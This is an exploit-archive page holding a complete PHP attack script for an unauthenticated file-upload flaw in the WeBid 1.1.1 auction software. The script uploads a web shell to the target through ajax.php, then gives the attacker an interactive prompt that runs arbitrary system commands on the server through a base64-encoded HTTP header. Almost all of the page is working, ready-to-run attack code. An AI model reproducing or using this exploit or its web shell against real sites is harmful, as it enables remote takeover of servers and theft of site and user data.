Home / exploits WeBid 1.1.1 Unrestricted File Upload
Posted on 24 February 2015
<?php /* ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / ` / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' Exploit Title : WeBid 1.1.1 Unrestricted File Upload Exploit Date : 20 February 2015 Exploit Author : CWH Underground Site : www.2600.in.th Vendor Homepage : http://www.webidsupport.com/ Software Link : http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid%20v1.1.1/WeBid-1.1.1.zip/download Version : 1.1.1 Tested on : Window and Linux ##################################################### VULNERABILITY: Arbitrary File Upload Vulnerability ##################################################### /ajax.php /inc/plupload/examples/upload.php ##################################################### DESCRIPTION ##################################################### This exploit a file upload vulnerability found in WeBid 1.1.1, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution. ##################################################### EXPLOIT ##################################################### */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die(" [-] No response from {$host}:80 "); fputs($sock, $packet); return stream_get_contents($sock); } print " +----------------------------------------+"; print " | WeBid Unrestricted File Upload Exploit |"; print " +----------------------------------------+ "; if ($argc < 3) { print " Usage......: php $argv[0] <host> <path> "; print " Example....: php $argv[0] localhost /"; print " Example....: php $argv[0] localhost /WeBid/ "; die(); } $host = $argv[1]; $path = $argv[2]; $payload = "--o0oOo0o "; $payload .= "Content-Disposition: form-data; name="name" "; $payload .= "shell.php "; $payload .= "--o0oOo0o "; $payload .= "Content-Disposition: form-data; name="file"; filename="shell.php" "; $payload .= "Content-Type: application/octet-stream "; $payload .= "<?php error_reporting(0); print(___); passthru(base64_decode($_SERVER[HTTP_CMD])); "; $payload .= "--o0oOo0o-- "; $packet = "POST {$path}ajax.php?do=uploadaucimages HTTP/1.1 "; $packet .= "Host: {$host} "; $packet .= "Content-Length: ".strlen($payload)." "; $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o "; $packet .= "Cookie: PHPSESSID=cwh"." "; $packet .= "Connection: close {$payload}"; print " Exploiting..."; sleep(2); print "Waiting for shell... "; sleep(2); http_send($host, $packet); $packet = "GET {$path}uploaded/cwh/shell.php HTTP/1.1 "; $packet .= "Host: {$host} "; $packet .= "Cmd: %s "; $packet .= "Connection: close "; print " ,--^----------,--------,-----,-------^--, "; print " | ||||||||| `--------' | O "; print " `+---------------------------^----------| "; print " `\_,-------, _________________________| "; print " / XXXXXX /`| / "; print " / XXXXXX / ` / "; print " / XXXXXX /\______( "; print " / XXXXXX / "; print " / XXXXXX / .. CWH Underground Hacking Team .. "; print " (________( "; print " `------' "; while(1) { print " Webid-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die(" [-] Exploit failed! "); } ################################################################################################################ # Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 ################################################################################################################ ?>
